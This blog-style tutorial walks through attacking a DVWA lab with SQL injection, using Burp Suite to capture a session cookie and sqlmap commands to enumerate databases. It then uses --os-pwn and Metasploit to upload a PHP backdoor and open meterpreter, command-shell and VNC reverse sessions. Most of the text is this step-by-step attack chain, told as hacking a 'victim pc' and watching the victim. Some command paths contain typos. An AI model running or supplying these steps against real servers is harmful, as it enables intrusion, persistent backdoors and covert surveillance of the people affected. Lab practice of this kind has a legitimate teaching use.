Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)


This artilce is about how to use sqlmap for sql injection to hack victim pc and gain shell access. Here I had perform sql attack to gain three different type of  shell (meterpreter; command shell; VNC )

 Requirement:
Xampp/Wamp Server                                                                                                           
DVWA Lab
Kali Linux: Burp suite, sqlmap tool 

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here
Now open the DVWA in your pc and login with following credentials:

Username – admin
Password – password

Click on DVWA Security and set Website Security Level low

From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  


Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will be used later  in sqlmap commands.


Lets enumerate all databases name using “referrer and cookies” under sqlmap command.
sqlmap -u “http://192.168.1.79:81/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47 ″  --dbs




It has dumped all names of database. Now I am going to choose dvwa to access its back-end database management system.


Now type following command to access shell of web server and follow the screenshot.
sqlmap -u “http://192.168.1.79:81/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47 ″ -D dvwa --os-pwn


Type 1 for metasploit framework to establish a reverse connection then type 4 for php payload for supporting server and again type 1 for common location for writable directory to upload payload as backdoor in victim PC.


Here Type 1 for reverse tcp connection as default option. Now I will choose these entire three payloads one by one and try to hack web server every time. Now type 1 for meterpreter


It will load metasploit framework and provides meterpreter session 1.



Repeat the whole process till reverse tcp connection when further it ask to choose payload, then type 2 for shell.


Again it will load metasploit framework and provides command shell session 1.


Repeat the whole process till reverse tcp connection when further it ask to choose payload, this time now type 3 for VNC.


Again it will load metasploit framework and launchVNC viewer.


Here you can see from the given  screenshot that I had access victim pc through tightVNC and now victims each moment will be kept under my observation. Hence we have hacked victim pc three times with various type shell.



0 comments:

Post a Comment